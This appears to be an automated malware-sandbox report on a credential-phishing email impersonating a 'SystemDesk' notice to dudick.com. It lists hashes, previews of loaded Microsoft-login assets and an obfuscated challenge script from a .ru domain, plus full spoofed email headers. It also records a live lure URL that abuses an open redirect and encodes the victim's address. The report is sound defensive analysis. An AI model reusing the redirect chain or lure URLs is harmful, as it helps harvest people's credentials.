                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (7412), with no line terminators
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):7412
                                                                                                                        Entropy (8bit):5.783888189973108
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:tCilJGImAstbruaGxF1hcrHKqOqcOu6li4MV:tjlJGIIyD1WrHKqxcV6QP
                                                                                                                        MD5:63F7CEF73A450D92A46AE29967B180AF
                                                                                                                        SHA1:52002DECD096E1DBC68B6F35825B057A64ADDCD1
                                                                                                                        SHA-256:1344D01152D8A3EC214A1E1AB22B8012FD5E9D53E8BA6391FEBBA8183CC3C74A
                                                                                                                        SHA-512:79AEDF35956BCFD268771480600E9A61C83D7B1BA9D6FF0E34D4BB634CF922A4BA8113E69149EAA00AE034212BFA81793696A50DE966E696825200527D1A5ABA
                                                                                                                        Malicious:false
                                                                                                                        URL:https://office.q2zg22.ru/cdn-cgi/challenge-platform/h/b/scripts/jsd/24864818/main.js
                                                                                                                        Preview:window._cf_chl_opt={cFPWv:'b'};~function(R,g,h,i,j,o){R=b,function(d,e,Q,f,y){for(Q=b,f=d();!![];)try{if(y=parseInt(Q(317))/1+parseInt(Q(398))/2*(-parseInt(Q(343))/3)+parseInt(Q(321))/4*(-parseInt(Q(359))/5)+-parseInt(Q(318))/6+-parseInt(Q(349))/7*(-parseInt(Q(320))/8)+-parseInt(Q(356))/9*(-parseInt(Q(298))/10)+-parseInt(Q(335))/11*(-parseInt(Q(337))/12),y===e)break;else f.push(f.shift())}catch(z){f.push(f.shift())}}(a,344531),g=this||self,h=g[R(324)],i={},i[R(365)]='o',i[R(381)]='s',i[R(311)]='u',i[R(399)]='z',i[R(309)]='n',i[R(334)]='I',i[R(338)]='b',j=i,g[R(369)]=function(d,f,y,z,W,B,C,D,E,F,G){if(W=R,f===null||f===void 0)return z;for(B=m(f),d[W(384)][W(378)]&&(B=B[W(357)](d[W(384)][W(378)](f))),B=d[W(383)][W(397)]&&d[W(372)]?d[W(383)][W(397)](new d[(W(372))](B)):function(H,X,I){for(X=W,H[X(315)](),I=0;I<H[X(374)];H[I+1]===H[I]?H[X(364)](I+1,1):I+=1);return H}(B),C='nAsAaAb'.split('A'),C=C[W(375)][W(387)](C),D=0;D<B[W(374)];E=B[D],F=l(d,f,E),C(F)?(G=F==='s'&&!d[W(303)](f[E]),W(373)=
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):2672
                                                                                                                        Entropy (8bit):6.640973516071413
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                        MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                        SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                        SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                        SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                                                        Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):17174
                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                        Malicious:false
                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):1864
                                                                                                                        Entropy (8bit):5.222032823730197
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                        MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                        SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                        SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                        SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (14735)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):15708
                                                                                                                        Entropy (8bit):5.365401844052044
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:DmeX/4OSgc2c2ZC2CvfeXOh+rF3lsb4DZDmzfXdv79sYxi:T/XrItB57igi
                                                                                                                        MD5:643CDB4AD560E6DBD4064879D8CF002B
                                                                                                                        SHA1:89D8D5C4774C286442CF75B7F573AB4D6432F69E
                                                                                                                        SHA-256:2A97C24EE7138154C1AB45FE46D7DBB0E439A63E5B1D46167ADBED0221A20729
                                                                                                                        SHA-512:F6A22EE5CE4447BFA0D27AC7B41F7244405D2BBCFCA8BA0FDB62F72FE0D4D2DC6F6B41AD626CC014FAE4277729CEB4E0BFCA8489A10D621AF03CB24ABB1A3691
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d513b6f0c9182bbf1e0f.js
                                                                                                                        Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[17],{499:function(e,n,s
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):17174
                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                        Malicious:false
                                                                                                                        URL:https://logincdn.msftauth.net/16.000.30091.10/images/favicon.ico
                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 26174
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):7273
                                                                                                                        Entropy (8bit):7.975575578248987
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:JnOdrG40vDEC7Ao5sdYEDDSEmHQYMj+VHL:JnOBsSogSvMaVHL
                                                                                                                        MD5:0FB4D411B049BC54BA06BBA7C82DF97E
                                                                                                                        SHA1:7D92F95F4327E79F1B268C94B42C208B3F68D616
                                                                                                                        SHA-256:A46667D530B42E9F00601161A0EFBC9BDDA55F0775473DE49FF5F5A6E08275AD
                                                                                                                        SHA-512:B1A73F110A8AB44F85684F917188F472F3DE419289A3F80032D8C9257AAD9CF209430A8C6FB432E10A7A81DC15E1872BFB6F423932042F0458BE3642F455E2A6
                                                                                                                        Malicious:false
                                                                                                                        URL:https://logincdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_ppassword_b2365db90edea8b1b8b1.js
                                                                                                                        Preview:...........]{w.6...?....0c;m........Ck).6..C...".......w....-....{.z*. 0..f..........._.....?8..h.'......._....i.x}:.).?...6......I...Pc....#.;.&...c...q.f..R-..g..D...C....B.\.i='.K.g.@..5....e....r-d.w.....E.Pm.z4..S.j.......S..7.I2..j.Dsb.%.kc......X3...nd.............7..g.b4.Ac...K..DN....q.-.<....N4..,..`yA.X...7+.Lh|.,...z..a%.Fo#...Km.;!.<..&...h.........."`D..h4.,.h.s+./.....h.....D.w.w^nm....c.[S..z.|...|d.l..c.I.$..{...........gRV........?....Z.~/..%H?......q|q.{........z.M.:....g.Pd+...?|2.h.L...v_~"w....x..8,...p.......k..?....g. ..|k..~^.....0..u.7H..P<...9..4L...4c..z..9.1H....~.i..l......An....L...A...........}............M...A.9.(..U7..h.x..2...E..O...df..k.D4&};1_.....<..B6{...+.J..6j4...I>,.Uv).zp.'.........E.9T...%#...$....\..w:...~tE..}`...o..K..9I..M>....{1....#...8~....CMp.............+.;0._f.......|.h.f{...hO.......p...)w<.........5..[I..O.;!..-.....?..K...<.......Z4....a.......{.......8l..e..<..kr..#..E..@.D.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):17174
                                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                        Malicious:false
                                                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):673
                                                                                                                        Entropy (8bit):7.6596900876595075
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                        MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                        Malicious:false
                                                                                                                        URL:https://logincdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                                        Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:GIF image data, version 89a, 352 x 3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2672
                                                                                                                        Entropy (8bit):6.640973516071413
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                        MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                        SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                        SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                        SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                        Malicious:false
                                                                                                                        Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                        File type:ASCII text, with very long lines (712), with CRLF line terminators
                                                                                                                        Entropy (8bit):6.088224887528858
                                                                                                                        TrID:
                                                                                                                          File name:dudick SystemDesk Important Crediential Notification 1.eml
                                                                                                                          File size:881'962 bytes
                                                                                                                          MD5:b11651fa3218ada5b9c92f80dc55d4a5
                                                                                                                          SHA1:13c2d5e404240206771d5488d1ae018ebb66689f
                                                                                                                          SHA256:f276abeda2d8eed011c41849e7808be1417f8d093cdf951ff45005a5b57bf64f
                                                                                                                          SHA512:9a7f314ea314011c2ce7dbff381799d125950000ddf020637bc2743fbab33f7088692b856ca587a67a02c8f8cf870ec00db90c44cab5fb22d8a6d7c7ddfb964c
                                                                                                                          SSDEEP:24576:KpjLmwJxwIM7HifRq1kK/ITlBqX6EIk0R:gyqqYJB+m
                                                                                                                          TLSH:B515123DCEAA61BB6306F1FABD20EC5B2DF54E83407710C076DC54A2289B5EB1767891
                                                                                                                          File Content Preview:X-MS-Exchange-Organization-ATPService-SubmissionContext: _subId=717659ef-f4c1-ee11-bffa-98f2b3c42f82;_wl=2;_st=1..X-MS-Exchange-Organization-InternalOrgSender: False..Received: from BN1PR12CA0012.namprd12.prod.outlook.com (2603:10b6:408:e1::17).. by SJ0PR
                                                                                                                          Subject:dudick SystemDesk Important Crediential Notification 1
                                                                                                                          From:dudick Authentication <rmcdermand@atriumurbana.com>
                                                                                                                          To:sales@dudick.com
                                                                                                                          Cc:
                                                                                                                          BCC:
                                                                                                                          Date:Fri, 02 Feb 2024 18:00:18 +0000
                                                                                                                          Communications:
                                                                                                                          • https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ== Disclaimer The information contained in this communication from the sender is confidential. It is intended solely for use by the recipient and others authorized to receive it. If you are not the recipient, you are hereby notified that any disclosure, copying, distribution or taking action in relation of the contents of this information is strictly prohibited and may be unlawful. Disclaimer The information contained in this communication from the sender is confidential. It is intended solely for use by the recipient and others authorized to receive it. If you are not the recipient, you are hereby notified that any disclosure, copying, distribution or taking action in relation of the contents of this information is strictly prohibited and may be unlawful. Disclaimer The information contained in this communication from the sender is confidential. It is intended solely for use by the recipient and others authorized to receive it. If you are not the recipient, you are hereby notified that any disclosure, copying, distribution or taking action in relation of the contents of this information is strictly prohibited and may be unlawful. Disclaimer The information contained in this communication from the sender is confidential. It is intended solely for use by the recipient and others authorized to receive it. If you are not the recipient, you are hereby notified that any disclosure, copying, distribution or taking action in relation of the contents of this information is strictly prohibited and may be unlawful. Disclaimer The information contained in this communication from the sender is confidential. It is intended solely for use by the recipient and others authorized to receive it. If you are not the recipient, you are hereby notified that any disclosure, copying, distribution or taking action in relation of the contents of this information is strictly prohibited and may be unlawful. Disclaimer The information contained in this communication from the sender is confidential. It is intended solely for use by the recipient and others authorized to receive it. If you are not the recipient, you are hereby notified that any disclosure, copying, distribution or taking action in relation of the contents of this information is strictly prohibited and may be unlawful. Disclaimer The information contained in this communication from the sender is confidential. It is intended solely for use by the recipient and others authorized to receive it. If you are not the recipient, you are hereby notified that any disclosure, copying, distribution or taking action in relation of the contents of this information is strictly prohibited and may be unlawful.
                                                                                                                          Attachments:
                                                                                                                          • thumbnail_docusign.PNG
                                                                                                                          Key Value
                                                                                                                          X-MS-Exchange-Organization-ATPService-SubmissionContext_subId=717659ef-f4c1-ee11-bffa-98f2b3c42f82;_wl=2;_st=1
                                                                                                                          X-MS-Exchange-Organization-InternalOrgSenderFalse
                                                                                                                          Receivedfrom [127.0.0.1] (157.254.164.223) by BN1PEPF00004682.mail.protection.outlook.com (10.167.243.88) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.7249.19 via Frontend Transport; Fri, 2 Feb 2024 18:00:18 +0000
                                                                                                                          Authentication-Resultsspf=softfail (sender IP is 157.254.164.223) smtp.mailfrom=atriumurbana.com; dkim=none (message not signed) header.d=none;dmarc=fail action=none header.from=atriumurbana.com;compauth=none reason=405
                                                                                                                          Received-SPFSoftFail (protection.outlook.com: domain of transitioning atriumurbana.com discourages use of 157.254.164.223 as permitted sender)
                                                                                                                          Fromdudick Authentication <rmcdermand@atriumurbana.com>
                                                                                                                          Tosales@dudick.com
                                                                                                                          Subjectdudick SystemDesk Important Crediential Notification 1
                                                                                                                          Message-ID<eabc18ba-6851-1439-7a09-7b942df5ee7c@atriumurbana.com>
                                                                                                                          X-Priority1 (Highest)
                                                                                                                          X-MSMail-PriorityHigh
                                                                                                                          ImportanceHigh
                                                                                                                          DateFri, 02 Feb 2024 18:00:18 +0000
                                                                                                                          MIME-Version1.0
                                                                                                                          Return-Pathrmcdermand@atriumurbana.com
                                                                                                                          X-MS-Exchange-Organization-OriginalArrivalTime02 Feb 2024 18:00:18.2063 (UTC)
                                                                                                                          X-MS-Exchange-Organization-ExpirationStartTime02 Feb 2024 18:00:18.2845 (UTC)
                                                                                                                          X-MS-Exchange-Organization-ExpirationStartTimeReasonOriginalSubmit
                                                                                                                          X-MS-Exchange-Organization-ExpirationInterval1:00:00:00.0000000
                                                                                                                          X-MS-Exchange-Organization-ExpirationIntervalReasonOriginalSubmit
                                                                                                                          X-MS-Exchange-Organization-Network-Message-Id22efba12-825e-4abd-0e9a-08dc2418d0ee
                                                                                                                          X-MS-Exchange-Organization-OriginalClientIPAddress157.254.164.223
                                                                                                                          X-MS-Exchange-Organization-OriginalServerIPAddress10.167.243.88
                                                                                                                          X-EOPAttributedMessage0
                                                                                                                          X-EOPTenantAttributedMessage5573221e-1079-4e51-a604-13d46e958b70:0
                                                                                                                          X-MS-Exchange-Organization-TargetResourceForestnamprd18.prod.outlook.com
                                                                                                                          X-MS-Exchange-Organization-OrgEopForestNAM11
                                                                                                                          X-MS-Exchange-Organization-MessageDirectionalityIncoming
                                                                                                                          X-MS-Exchange-Organization-Id5573221e-1079-4e51-a604-13d46e958b70
                                                                                                                          X-MS-Exchange-Organization-FFO-ServiceTagNAM11B
                                                                                                                          X-MS-Exchange-Organization-Cross-Premises-Headers-ProcessedBN1PEPF00004682.namprd03.prod.outlook.com
                                                                                                                          X-MS-Exchange-Organization-ConnectingIP157.254.164.223
                                                                                                                          X-MS-Exchange-Organization-ConnectingEHLO[127.0.0.1]
                                                                                                                          X-MS-Exchange-Organization-AS-LastExternalIp157.254.164.223
                                                                                                                          X-MS-Exchange-Organization-IsBipIncludedAtpTenanttrue
                                                                                                                          X-MS-Exchange-Organization-IsAtpTenanttrue
                                                                                                                          X-MS-Exchange-Organization-Originating-CountryCA
                                                                                                                          X-MS-Exchange-Organization-OriginalEnvelopeRecipientssales@dudick.com
                                                                                                                          X-MS-Exchange-Organization-EhloAndPtrDomain[127.0.0.1]
                                                                                                                          X-MS-Exchange-Organization-MxPointsToUsfalse
                                                                                                                          X-MS-Exchange-Organization-RecipientDomainMxRecord-PFAFDdudick.com#us-smtp-inbound-1.mimecast.com;us-smtp-inbound-2.mimecast.com
                                                                                                                          X-MS-Exchange-Organization-RecipientDomainMxInfodudick.com#Mimecast#us-smtp-inbound-1.mimecast.com;us-smtp-inbound-2.mimecast.com
                                                                                                                          X-MS-Exchange-Organization-CompAuthResnone
                                                                                                                          X-MS-Exchange-Organization-CompAuthReason300
                                                                                                                          X-MS-Exchange-Organization-SpoofDetection-Frontdoor-DisplayDomainNameatriumurbana.com
                                                                                                                          X-MS-Exchange-Organization-SenderRep-Score5
                                                                                                                          X-MS-Exchange-Organization-SenderRep-DataIpClassLargeGrayOther_GrayOther_GrayOther
                                                                                                                          X-MS-Exchange-Organization-VBR-ClassGrayOther
                                                                                                                          X-MS-Exchange-Organization-HMATPModel-Spf3
                                                                                                                          X-MS-Exchange-Organization-HMATPModel-Recipient<PII:H101(2p/M/Cu4sCF47toN5wQBY30Ggx8bgo2PMF+1hYGE4Gg=)>@dudick.com
                                                                                                                          X-MS-Exchange-Organization-TransportTrafficTypeEmail
                                                                                                                          X-MS-PublicTrafficTypeEmail
                                                                                                                          X-MS-TrafficTypeDiagnosticBN1PEPF00004682:EE_|SJ0PR18MB3803:EE_
